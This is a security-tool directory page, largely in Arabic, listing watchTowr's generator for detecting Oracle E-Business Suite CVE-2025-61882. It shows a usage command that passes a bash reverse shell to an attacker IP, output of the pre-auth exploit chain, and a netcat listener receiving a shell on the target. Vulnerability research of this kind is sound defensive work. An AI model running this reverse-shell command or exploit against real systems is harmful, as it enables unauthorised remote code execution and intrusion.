Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882 — يولد عناصر كشف لـ Oracle E-Business Suite CVE-2025-61882 عبر تقديم حمولة قشرة عكسية للتحقق من RCE قبل المصادقة. | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-oracle-e-business-suite-cve-2025-61882
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubwatchtowrlabs/watchtowr-vs-oracle-e-business-suite-cve-2025-61882

watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

يولد عناصر كشف لـ Oracle E-Business Suite CVE-2025-61882 عبر تقديم حمولة قشرة عكسية للتحقق من RCE قبل المصادقة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
5593منذ 11 أشهرتمت المراجعة من قبل Kitploit
مشاركة

watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

image

مولّد القطع الأثرية للكشف عن Oracle E-Business Suite CVE-2025-61882

راجع منشور مدونتنا للتفاصيل الفنية

الاكتشاف أثناء التنفيذ

root@kitploit:~
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux  --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__/
                                  \/          \/     \/

        watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py

        (*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator

          - Sonny, Sina Kheirkhah (@SinSinology),  Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-61882]

[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -

المستمع

root@kitploit:~
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$

الوصف

يحاول هذا السكربت اكتشاف ما إذا كان Oracle E-Business Suite معرّضًا لثغرة CVE-2025-61882

الإصدارات المتأثرة

Oracle E-Business Suite، الإصدارات 12.2.3-12.2.14

لمزيد من المعلومات، تفضل بزيارة تنبيه Oracle الأمني - CVE-2025-61882

تابع مختبرات watchTowr

لأحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

تنزيل الأداة